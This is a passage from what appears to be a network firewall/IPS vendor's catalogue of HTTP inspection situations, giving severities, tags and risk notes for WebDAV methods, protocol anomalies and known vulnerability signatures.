Description: The WebDAV request method BPROPFIND was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. BPROPFIND requests properties for resources identified by the request URI. BPROPFIND is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. BPROPFIND is used to query properties of a document. WWW server contents cannot be changed with the BPROPFIND request method.
Back to top

HTTP_Request-WebDAV-BPROPPATCH

About this situation: WebDAV method BPROPPATCH seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method BPROPPATCH was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. BPROPPATCH changes properties for resources identified by the request URI. BPROPPATCH is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, BPROPPATCH, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-COPY

About this situation: WebDAV method COPY seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method COPY was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. COPY is used to copy a document on the WWW server. COPY is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, COPY, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-LOCK

About this situation: WebDAV method LOCK seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method LOCK was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. LOCK locks the resource identified by the request URI. LOCK is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low.
Back to top

HTTP_Request-WebDAV-MKCOL

About this situation: WebDAV method MKCOL seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method MKCOL was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. MKCOL is used to create a collection on a WWW server. MKCOL is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, MKCOL, and COPY, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-MOVE

About this situation: WebDAV method MOVE seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Vulnerability: Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
Description: The WebDAV request method MOVE was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. MOVE is used to move a target resource on the WWW server. MOVE is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, MOVE, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-PROPFIND

About this situation: WebDAV method PROPFIND seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: The WebDAV request method PROPFIND was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. PROPFIND requests the properties for the resource identified by the request URI. PROPFIND is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. PROPFIND is used to query properties of a document. WWW server contents cannot be changed with the PROPFIND request method.
Back to top

HTTP_Request-WebDAV-PROPPATCH

About this situation: WebDAV method PROPPATCH seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method PROPPATCH was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. PROPPATCH changes the properties for the resource identified by the request URI. PROPPATCH is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low. Some request methods, such as DELETE, PROPPATCH, and MKCOL, could be used when attempting to modify the WWW server contents.
Back to top

HTTP_Request-WebDAV-REPORT

About this situation: WebDAV method REPORT seen in HTTP request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method REPORT was seen in an HTTP request. Risk analysis: Risk level is low.
Back to top

HTTP_Request-WebDAV-UNLOCK

About this situation: WebDAV method UNLOCK seen in HTTP request
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The WebDAV request method UNLOCK was seen in an HTTP request. An HTTP [RFC 2616] request begins with the request method describing what the client wants from the server. UNLOCK unlocks the resource identified by the request URI. UNLOCK is not a part of HTTP 1.1 [RFC 2616], but instead WebDAV [RFC 2518]. WebDAV specifies methods for distributed authoring. Risk analysis: Risk level is low.
Back to top

HTTP_Request-with-redirect-capability

About this situation: Pass original URL as the parameter with the redirect URL.
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-621-5211
Last changed: sgpkg-ips-1531-5242
Description: If a connection is terminated with this situation, the original URL is appended as a GET parameter to the user response redirection URL. The most common case is enabling Browser Based Authentication to automatically redirect to the original page. Risk analysis: Risk level is none.
Back to top

HTTP_Request-Without-Reply

About this situation: Request has been made but no server reply was seen
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: The HTTP client request did not receive an HTTP reply to a request. This occurs, for example, when the server is under a Denial of Service attack by a request and therefore unable to respond. In this case, the attack can be often determined from the requested resource and the associated HTTP method. This situation can also occur when the server is too overloaded to process the request, or if IDS was unable to handle the server-side packets of the connection on the application layer for some reason. Risk analysis: Risk level is low.
Back to top

HTTP_Response-Extra-Data

About this situation: Extra data seen after HTTP response body
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: There was extra data after an HTTP response sent by the HTTP server that was not part of either the response body or the status line of a following response. This situation is most often caused by a buggy HTTP server outputting additional characters such as extra newlines after the response body that are not included in the body size specified in the Content-Length header. This situation can also occur if an HTTP server announces a Content-Length too small for the content it is about to send, or precedes the status line of a response with a string other than "HTTP". Risk analysis: Risk level is low. There are a number of HTTP servers in use that add a few extra newline characters after the response body. Most of the popular brands of Web browsers can cope with this anomaly.
Back to top

HTTP_Response-Header

About this situation: Response header
Context: SSM Context
Severity: 1
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Request denied with response header.
Back to top

HTTP_Response-Version-0-9

About this situation: HTTP protocol version was not detected from a response
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Description: The HTTP protocol version was not detected from a response, and further parsing for header fields will be discontinued. This can mean that this is a HTTP version 0.9 response, or the server might not be speaking HTTP at all. HTTP version 0.9 is considered obsolete. Risk analysis: Risk level is low. HTTP/0.9 is sometimes used when users retrieve documents manually. However, HTTP/0.9 has also been used for IPS evasion, as some IPSes have been unable to correctly interpret HTTP/0.9.
Back to top

HTTP_Response-Version-HTTP

About this situation: HTTP protocol name was detected from a response
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Description: The protocol name "HTTP" was detected from the server response status line.
Back to top

HTTP_Response-Version-Malformed

About this situation: HTTP response version field was malformed
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-702-5211
Description: The HTTP server sent a protocol version identifer in an invalid format. A malformed version identifier is detected when the response starts with "HTTP", but otherwise does not conform to the HTTP protocol version syntax, has trailing characters, or the version number is missing. The valid HTTP protocol version syntax consists of "HTTP/", and a major and minor version number separated with a dot. Risk analysis: Risk level is medium.
Back to top

HTTP_SafeSearch-Rewrite

About this situation: SafeSearch rewrite
Context: HTTP without parameters
Severity: 5
Tags: Inspection
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: SafeSearch has been enforced
Back to top

HTTP_SAP-GUI-ActiveX-Control-Buffer-Overflow

About this situation: Detected attempt to use vulnerable ActiveX component in SAP GUI
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, SAP GUI, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: SAPGUI-AddTab-Method-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SCH-Chunk-Extension

About this situation: Detected chunk header extension
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-1178-5242
Description:
Back to top

HTTP_SCH-Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in GNU Wget detected
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Wget, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1146-5242
Vulnerability: Gnu-Wget-Skip_Short_Body-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SCH-HTML-In-Chunk-Extension

About this situation: Detected HTML in the chunk extensions
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1164-5242
Description:
Back to top

HTTP_SCH-Large-Chunk-Size

About this situation: Detected over 4 GB sized chunk header
Context: HTTP Server Chunk Header
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-592-5211
Description:
Back to top

HTTP_SCH-Microsoft-HTTP-Services-And-Nginx-Chunked-Encoding-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Microsoft Windows HTTP Services detected
Context: HTTP Server Chunk Header
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Windows Vista, Windows 2008, Any Hardware, MS2009-04, CVE2009, CVE2013, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-419-4219
Vulnerability: Microsoft-HTTP-Services-Chunked-Encoding-Integer-Overflow
Nginx-Chunked-Transfer-Parsing-Denial-Of-Service
Description:
Back to top

HTTP_SCH-Non-Valid-Data-In-Chunk-Extension

About this situation: Detected suspicious content in the chunk extension
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1710-5242
Description:
Back to top

HTTP_SCH-Non-Valid-Data-In-Chunk-Header

About this situation: Detected suspicious content in the chunk headers
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1164-5242
Description:
Back to top

HTTP_SCH-Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Client for Windows detected
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iPrint Client for Windows, CVE2013, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-529-5211
Last changed: sgpkg-ips-529-5211
Vulnerability: Novell-iPrint-Client-For-Windows-IPP-Response-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SCH-Script-In-Chunk-Extension

About this situation: Detected a script in the chunk extensions
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1164-5242
Last changed: sgpkg-ips-1164-5242
Description:
Back to top

HTTP_SCH-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Server Chunk Header
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Information
First detected in: sgpkg-ips-1179-5242
Last changed: sgpkg-ips-1179-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_SCH-Unusually-Large-Chunk-Extension

About this situation: Detected suspicious content in the chunk extension
Context: HTTP Server Chunk Header
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2024, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Vulnerability: Squid-Proxy-HTTP-Chunked-Decoder-Denial-Of-Service
Description:
Back to top

HTTP_Scripting.FileSystemObject-ActiveX-Object-Local-File-Write

About this situation: Detected a local file write attempt using Scripting.FileSystemObject ActiveX object
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-342-4219
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

HTTP_Separator

About this situation: Invalid separator string
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Multipart/mimetype has invalid separator string.
Back to top

HTTP_Server-Boundary-String-Too-Long

About this situation: HTTP server response specified too long multipart boundary delimiter
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: A HTTP server response specified a multipart boundary delimiter that was too long. The response violates the multipart message specification [RFC 2046]. Risk analysis: Risk level is fairly low. Very long boundary delimiters can be used in buffer overflow attacks.
Back to top

HTTP_Server-Connect-OK

About this situation: HTTP server accepted a connect request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-676-5211
Description: HTTP proxy/server has accepted HTTP tunneling request from the client.
Back to top

HTTP_Server-Content-Disposition-Without-Mandatory-Part

About this situation: Content-Disposition header missing a mandatory part seen in HTTP server response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP server sent a response containing an improperly formatted Content-Disposition header whose value is missing the mandatory "disposition-type" part. The Content-Disposition header is often used with the HTTP protocol to instruct the receiver how to process a message payload, as specified by RFC 6266. Its typical uses include specifying whether the payload should be displayed to the user in a media-specific manner ("inline") or downloaded to a file ("attachment"), as well as specifying a file name to be used when saving the downloaded content as a file. RFC 6266 specifies that the Content-Disposition header must always include a disposition type (typically "inline" or "attachment"). In addition to this, the header is allowed to contain optional parameter-value pairs, for example a "filename" parameter with an associated filename string. An example of a correctly formatted Content-Disposition header would be: Content-Disposition: attachment; filename="myfile.txt" Some HTTP implementations, however, violate the specification by omitting the mandatory disposition type and only including an optional parameter, typically a filename. An example of such an improper form would be: Content-Disposition: filename="myfile.txt" That form, when detected on an HTTP protocol session, would produce this situation. Risk analysis: Risk level is low. There are a number of HTTP implementations in use that exhibit this violation. In many cases there is little or no practical consequence since implementations are advised to default to "attachment" which is often the intended effect when this erroneous form is used.
Back to top

HTTP_Server-Content-Type-Without-Mandatory-Part

About this situation: Content-Type header missing a mandatory part seen in HTTP server response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP server sent a response containing an improperly formatted Content-Type header whose value is missing the mandatory "media-type" part. The Content-Type header is used with the HTTP protocol to inform the receiver about the intended representation of the message payload, as specified by RFC 7231. It conveys information about the type of media contained in the payload as well as optional interpretation instructions, such as the character set used with text-based media. RFC 7231 specifies that the Content-Type header must always include a media type (for example "text/html"). In addition to this, the header is allowed to contain optional parameter-value pairs, for example a "charset" parameter with an associated character set name. An example of a correctly formatted Content-Type header would be: Content-Type: text/html; charset=utf-8 Some HTTP implementations, however, violate the specification by omitting the mandatory media type and only including an optional parameter, typically a character set. An example of such an improper form would be: Content-Type: charset=utf-8 That form, when detected on an HTTP protocol session, would produce this situation. Risk analysis: Risk level is low. There are a number of HTTP implementations in use that exhibit this violation. In many cases there is limited practical consequence since implementations typically use substitutive strategies to obtain a viable representation. In some cases, content may display incorrectly.
Back to top

HTTP_Server-Decompression-Error-Incomplete-Data

About this situation: Incomplete compressed HTTP/1.1 server data
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: The end of the compressed data sent by an HTTP/1.1 server was not reached after all data was received.
Back to top

HTTP_Server-Decompression-Error-No-Data

About this situation: Decompression error, no HTTP/1.1 server data decompressed
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: There was an error when decompressing data sent by an HTTP/1.1 server and no data could be decompressed. The actual encoding could be different than the encoding indicated by the content-encoding header or the data could have been sent without being encoded at all. The data was fed to file filtering without decompression.
Back to top

HTTP_Server-Decompression-Trailing-Data

About this situation: Trailing data after compressed HTTP/1.1 server data
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-1792-5242
Last changed: sgpkg-ips-1792-5242
Description: An HTTP/1.1 server sent some trailing data after it completed sending compressed data.
Back to top

HTTP_Server-Header-Name-Too-Long

About this situation: Server header name too long
Context: HTTP Server Header Name Length Limit
Severity: 8
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: F5-Big-IP-TMM-Out-Of-Bounds-Write
Description: The HTTP server sent a message header field that was too long. An HTTP header field name was too long from the start of the header up to the colon (:). Risk analysis: Risk level is high. This may be an attempt at overflowing a buffer.
Back to top

HTTP_Server-Header-Name-Unparseable

About this situation: Header with an unparseable name seen in HTTP server response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP server sent a message header field whose name is in an incorrect format. The correct HTTP header name syntax is the name of the header field separated by a colon (:) from the header field value. Incorrect header name syntax is detected when the header name does not end in a colon or contains a character that is not allowed in HTTP header names. Risk analysis: Risk level is medium. A message header field with an incorrect format may be an attempt to feed shell code to the HTTP client. However, incorrect format could be caused by the WWW server or a server-side application that uses non-standard characters in the header field names. Most relevant log fields: "HTTP header" shows the detected header line.
Back to top

HTTP_Server-Header-Value-Unparseable

About this situation: Header with an unparseable value seen in HTTP server response
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP server sent a message header field whose value is in an incorrect format. This situation is produced when the value of an HTTP protocol header field cannot be parsed by the HTTP inspection module using parsing rules derived from the description of the syntax of the field in question as given by the HTTP specification (RFC 7230 et al). This is a rather generic situation, used when there is no specific situation for the precise sort of excursion from correct syntax that has occurred. Such specific situations are mostly available for conditions that are either known to directly present a threat, or potentially capable of impairing the NGFW engine's ability to inspect and secure the connection; the NGFW is not meant as a general-purpose protocol verifier. If such a specific situation exists, it takes precedence over this situation (i.e. this situation will not be raised, even if the condition was technically consistent with the description of this situation). Risk analysis: Risk level is fairly low. There are a number of HTTP implementations in use that do not strictly follow the HTTP specification in all aspects. As a result, many implementations do not expect perfect compliance, and can perform satisfactorily in the presence of minor protocol anomalies. As explained above, high risk behavior is covered with specialized situations. Most relevant log fields: "HTTP header" shows the detected header line.
Back to top

HTTP_Server-Headers

About this situation: HTTP server headers were seen at the beginning of a connection
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: HTTP reply headers were sent by the server at the beginning of a connection. This situation can be used together with HTTP_Client-Headers to detect if a connection uses HTTP protocol.
Back to top

HTTP_Server-Hostile-Use-of-Header-Line-Folding

About this situation: HTTP server disguised a header critical for inspection using line folding
Context: HTTP without parameters
Severity: 7
Tags: Attack Related Anomalies
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Description: The HTTP server sent a protocol header whose correct parsing is essential for the successful inspection of the message content, using a deprecated practice of line folding in an apparent attempt to interfere with inspection. This situation can be viewed as a more severe special case of the HTTP_Server-Obsolete-Header-Line-Folding situation. It is produced when something looking like a folded instance of a Content-Encoding, Transfer-Encoding, or Content-Length header is detected in the header stream. Seeing this situation is a very likely sign of malicious activity. Line folding, or the practice of extending a header field value over multiple lines by preceding the extra lines with space or tab characters, was defined in the initial version of the HTTP/1.1 specification (RFC 2616) but was deprecated in a later version (RFC 7230) because it creates ambiguities in parsing, thus opening up potential security holes. RFC 7230 not only discourages but strictly forbids the use of header line folding, mandating implementations to treat it as invalid input. A typical attack using line folding usually tries to confuse the protocol inspector about the location of the boundary between the HTTP protocol headers and the message body, or about the content or transfer encodings applied to the message body, in the intention of passing a malicious payload through inspection disguised as a protocol header or a message body encoded with an encoding different from what is apparently indicated. Such an attack takes advantage of the fact that the protocol inspector and the final receiving end are likely to interpret poorly specified protocol features differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not. This situation should always be set to terminate the connection. If it is discovered that this situation is occurring in the protected network environment because of the use of an application that is legitimate per se but outdated, updating or decommissioning the application should be considered as the primary remedy. If this situation is set not to terminate, protection against this kind of evasion will be lost and inspection quality against HTTP connections will be generally weakened as the HTTP parser may not be able to follow the protocol flow after being set off track.
Back to top

HTTP_Server-MIME-Parameter-Syntax-Incorrect

About this situation: MIME parameter used incorrect syntax in HTTP server response
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: A MIME parameter used incorrect syntax in an HTTP server response. MIME parameter value encoding violated the specification [RFC 2046]. The HTTP inspection module checks only the "boundary" parameter in the Content-Type header field of a MIME multipart message. Risk analysis: Risk level is fairly low. The HTTP inspection module does not have a valid value for the specified MIME parameter, which may affect further analysis.
Back to top

HTTP_Server-Multipart-Delimiter-Use-Invalid

About this situation: Multipart HTTP server response contained invalid characters on line after boundary string
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: A multipart HTTP server response contained invalid characters on the line after the boundary string. These types of lines should not appear in a multipart message. It is uncertain whether this line actually marks a border between two parts or not. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Server-Multipart-No-Valid-Boundary-String

About this situation: No valid boundary string specified for multipart HTTP server response
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: No valid boundary string was specified for a multipart HTTP server response. The response will be handled as if it only has one part. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Server-Multipart-Syntax-Error

About this situation: Invalid HTTP server multipart response
Context: HTTP without parameters
Severity: 7
Tags: Protocol Information
First detected in: sgpkg-ips-1776-5242
Last changed: sgpkg-ips-1776-5242
Description: The data sent by an HTTP/1.1 server could not be parsed as a multipart message although according to the HTTP headers the message is expected to be in the multipart format.
Back to top

HTTP_Server-Nested-Multipart-Message

About this situation: Multipart HTTP server response contained another multipart message
Context: HTTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-645-5211
Description: A multipart HTTP server response contained another multipart message. This is allowed by the specification [RFC 2046] but may lead to a potential buffer overflow. Risk analysis: Risk level is fairly low.
Back to top

HTTP_Server-Obsolete-Header-Line-Folding

About this situation: HTTP server used obsolete header line folding
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1070-5242
Description: The HTTP server used an obsolete practice of extending a header field value over multiple lines by preceding the extra lines with space or tab characters. This line folding was defined in the initial version of the HTTP/1.1 specification (RFC 2616) but was deprecated in a later version (RFC 7230) because it creates ambiguities in parsing, thus opening up potential security holes. RFC 7230 not only discourages but strictly forbids the use of header line folding, mandating implementations to treat it as invalid input. Seeing this situation is a sign of either the use of an outdated and obsolete application, or malicious activity. A typical attack using line folding usually tries to confuse the protocol inspector about the location of the boundary between the HTTP protocol headers and the message body in the intention of passing a malicious payload through inspection disguised as a header. Such an attack takes advantage of the fact that the protocol inspector and the final receiving end are likely to interpret poorly specified protocol features differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not. Because line folding can be used as an attack vector in an attempt to evade security systems and has no legitimate use in modern environments, this situation should always be set to terminate the connection. If it is discovered that this situation is occurring in the protected network environment because of the use of an application that is legitimate per se but outdated, updating or decommissioning the application should be considered as the primary remedy. If this situation is set not to terminate, protection against this kind of evasion will be lost and inspection quality against HTTP connections will be generally weakened as the HTTP parser may not be able to follow the protocol flow after being set off track.
Back to top

HTTP_Server-Protocol-Upgraded

About this situation: HTTP server accepted a protocol upgrade request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: HTTP server has accepted protocol upgrade request from the client. This is indicated by status code 101. This situation doesn't indicate that upgrade is valid HTTP/1.1 protocol upgrade; HTTP_Invalid-Server-Protocol-List should be terminated to block upgrades which don't have matching protocols on client and server side.
Back to top

HTTP_Server-Side-Includes-In-Server-Reply

About this situation: Detected server side scripting in the server reply
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-188-2032
Vulnerability: Web-Server-Side-Script-Disclosure
Description:
Back to top

HTTP_Server-Syntax-Error

About this situation: Invalid HTTP server request
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The data sent by the server could not be parsed as a HTTP reply. The reply may contain a syntax error, or the server may not be using HTTP at all.
Back to top

HTTP_Shared-Variables-For-Server-Ie-Stream-Context

About this situation: This fingerprint sets shared variables
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-371-4219
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_Shared-Variables-For-Server-Stream-Context

About this situation: This fingerprint sets shared variables
Context: HTTP Server Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-720-5211
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_Shell.Application-ActiveX-Object-Local-File-Execute

About this situation: Detected a local file execute attempt using Shell.Application ActiveX object
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Internet Explorer, Windows not specific, Internet Explorer not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-192-2032
Vulnerability: Local-System-Access-Via-ActiveX-Controls
Description:
Back to top

HTTP_SHS-Acceptable-Long-Headers

About this situation: Long headers that are considered acceptable.
Context: HTTP Reply Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1429-5242
Description:
Back to top

HTTP_SHS-Adobe-Acrobat-File-Extension-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: HTTP Reply Header Line
Severity: 7
